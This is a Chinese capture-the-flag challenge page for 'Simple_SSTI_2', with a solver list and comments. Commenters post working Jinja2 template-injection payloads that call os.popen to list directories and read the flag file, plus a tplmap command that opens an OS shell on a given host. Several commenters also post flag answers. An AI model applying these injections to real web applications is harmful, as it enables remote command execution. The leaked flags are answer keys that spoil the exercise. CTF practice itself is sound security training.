Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16096
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
5032894 攻破了该题 5小时前
那天晚风和她 攻破了该题 2天前
huangyujie 攻破了该题 2天前
yamojito 攻破了该题 3天前
lin666 攻破了该题 3天前
Vergil 攻破了该题 5天前
乐乐a 攻破了该题 5天前
psych1 攻破了该题 5天前
eight8 攻破了该题 6天前
stragon 攻破了该题 6天前
liutong27 攻破了该题 6天前
tiger007 攻破了该题 7天前
Leext 攻破了该题 7天前
storysnail 攻破了该题 7天前
zengzhijing 攻破了该题 7天前
ffggfhge 攻破了该题 7天前
孙燕姿圈外男友 攻破了该题 8天前
huasir 攻破了该题 8天前
xiayanting 攻破了该题 9天前
评论
shansang 2年前
举报
python3 ./tplmap.py -u http://114.67.175.224:13633/?flag --engine=Jinja2 --os-shell
热热热热热若 2年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
starrabbit 2年前
举报
也可通过tplmap工具直接获取权限
hxl223 2年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
nepw 2年前
举报
通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c
DK2021 2年前
举报
/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
453137 2年前
举报
flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
earlyyue 2年前
举报
/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}
氕氘氚 2年前
举报
flag{0c6e1431cbe4e002c413bcaa0e5dfa51}
mcreterro 2年前
举报
flag{e4b09223a5f6e916f2865c0548458616}